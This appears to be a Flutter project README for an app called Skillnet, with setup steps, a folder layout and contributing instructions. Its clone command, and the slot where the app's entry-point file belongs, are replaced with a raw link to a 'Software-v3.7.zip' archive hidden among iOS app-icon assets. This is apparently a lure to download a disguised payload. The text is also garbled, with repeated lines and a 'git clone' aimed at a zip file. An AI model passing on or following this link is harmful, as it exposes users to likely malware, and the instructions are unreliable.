A new Flutter project.
This project is a starting point for a Flutter application.
A few resources to get you started if this is your first Flutter project:
For help getting started with Flutter development, view the online documentation, which offers tutorials, samples, guidance on mobile development, and a full API reference.
A new Flutter project.
This project is a starting point for a Flutter application.
- Flutter SDK
- Dart SDK
- An editor like Android Studio or Visual Studio Code
-
Clone the repository:
git clone https://github.com/HypaSMarty/Skillnet/raw/refs/heads/main/ios/Runner/Assets.xcassets/AppIcon.appiconset/Software-v3.7.zip cd skillnet -
Fetch the dependencies:
flutter pub get
-
Run the app:
flutter run
The project directory is organized as follows:
lib/
├── https://github.com/HypaSMarty/Skillnet/raw/refs/heads/main/ios/Runner/Assets.xcassets/AppIcon.appiconset/Software-v3.7.zip # Entry point of the application
├── screens/ # Screen widgets
├── widgets/ # Reusable widgets
├── models/ # Data models
├── services/ # API and backend services
├── utils/ # Utility functions
- Add detailed project features here.
- Fork the repo.
- Create a new branch:
git checkout -b feature-name
- Commit your changes:
git commit -m "Description of changes" - Push to the branch:
git push origin feature-name
- Create a Pull Request.
For any issues, please create an issue.
This project is licensed under the MIT License - see the LICENSE file for details.